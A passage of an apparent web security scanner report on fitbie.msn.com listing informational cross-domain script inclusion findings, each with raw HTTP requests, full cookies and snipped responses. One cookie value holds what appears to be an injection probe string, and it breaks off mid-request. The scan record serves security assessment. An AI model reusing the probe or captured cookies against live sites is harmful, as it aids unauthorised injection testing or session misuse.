<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.19. http://fitbie.msn.com/look-better-naked-2-day-cleanse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /look-better-naked-2-day-cleanse

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /look-better-naked-2-day-cleanse HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:05 +0000
ETag: "1297607345-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42712
Expires: Mon, 14 Feb 2011 02:29:06 GMT
Date: Sun, 13 Feb 2011 14:37:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 79143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.20. http://fitbie.msn.com/lose-weight

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /lose-weight

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /lose-weight HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 13:36:26 +0000
ETag: "1297604186-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=40374
Expires: Mon, 14 Feb 2011 01:36:26 GMT
Date: Sun, 13 Feb 2011 14:23:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 103005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div>
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.21. http://fitbie.msn.com/lose-weight/after

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /lose-weight/after

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /lose-weight/after HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:25:30 +0000
ETag: "1297607130-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=43190
Expires: Mon, 14 Feb 2011 02:25:21 GMT
Date: Sun, 13 Feb 2011 14:25:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 109337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div>
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.22. http://fitbie.msn.com/lose-weight/fat-burning-workouts

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /lose-weight/fat-burning-workouts

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /lose-weight/fat-burning-workouts HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:02:03 +0000
ETag: "1297605723-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=41806
Expires: Mon, 14 Feb 2011 02:02:04 GMT
Date: Sun, 13 Feb 2011 14:25:18 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 100909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div>
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.23. http://fitbie.msn.com/meal-plan/lose-weight-400-calorie-meals

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /meal-plan/lose-weight-400-calorie-meals

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /meal-plan/lose-weight-400-calorie-meals HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:28:54 +0000
ETag: "1297607334-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42710
Expires: Mon, 14 Feb 2011 02:28:04 GMT
Date: Sun, 13 Feb 2011 14:36:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.24. http://fitbie.msn.com/men/toughness-challenge

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /men/toughness-challenge

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /men/toughness-challenge HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:08 +0000
ETag: "1297607348-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42685
Expires: Mon, 14 Feb 2011 02:29:01 GMT
Date: Sun, 13 Feb 2011 14:37:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 91078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.25. http://fitbie.msn.com/node/4411

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /node/4411

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /node/4411 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:10 +0000
ETag: "1297607350-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42645
Expires: Mon, 14 Feb 2011 02:28:38 GMT
Date: Sun, 13 Feb 2011 14:37:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.26. http://fitbie.msn.com/slideshow/10-grab-and-go-fitness-foods

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /slideshow/10-grab-and-go-fitness-foods

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /slideshow/10-grab-and-go-fitness-foods HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:39 +0000
ETag: "1297607199-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42915
Expires: Mon, 14 Feb 2011 02:26:36 GMT
Date: Sun, 13 Feb 2011 14:31:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 84150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.27. http://fitbie.msn.com/slideshow/11-reasons-spring-should-come-sooner

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /slideshow/11-reasons-spring-should-come-sooner

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /slideshow/11-reasons-spring-should-come-sooner HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; 